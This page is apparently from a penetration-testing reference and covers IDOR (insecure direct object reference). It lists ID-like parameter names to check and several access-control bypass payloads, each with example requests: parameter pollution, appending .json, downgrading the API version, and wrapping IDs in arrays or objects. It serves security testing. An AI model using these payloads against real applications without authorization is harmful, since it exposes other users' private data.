Pentest Book
Search…
IDOR
Basics
1
Check for valuable words:
2
{regex + perm} id
3
{regex + perm} user
4
{regex + perm} account
5
{regex + perm} number
6
{regex + perm} order
7
{regex + perm} no
8
{regex + perm} doc
9
{regex + perm} key
10
{regex + perm} email
11
{regex + perm} group
12
{regex + perm} profile
13
{regex + perm} edit
Copied!
Bypasses
- Add parameters onto the endpoints for example, if there was
1
GET /api_v1/messages --> 401
2
vs
3
GET /api_v1/messages?user_id=victim_uuid --> 200
Copied!
- HTTP Parameter pollution
1
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
2
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK
3
4
GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
Copied!
- Add .json to the endpoint, if it is built in Ruby!
1
/user_data/2341 --> 401 Unauthorized
2
/user_data/2341.json --> 200 OK
Copied!
- Test on outdated API Versions
1
/v3/users_data/1234 --> 403 Forbidden
2
/v1/users_data/1234 --> 200 OK
Copied!
Wrap the ID with an array.
1
{“id”:111} --> 401 Unauthriozied
2
{“id”:[111]} --> 200 OK
Copied!
Wrap the ID with a JSON object:
1
{“id”:111} --> 401 Unauthriozied
2
3
{“id”:{“id”:111}} --> 200 OK
Copied!
JSON Parameter Pollution:
1
POST /api/get_profile
2
Content-Type: application/json
3
{“user_id”:<legit_id>,”user_id”:<victim’s_id>}
Copied!
Last modified 1yr ago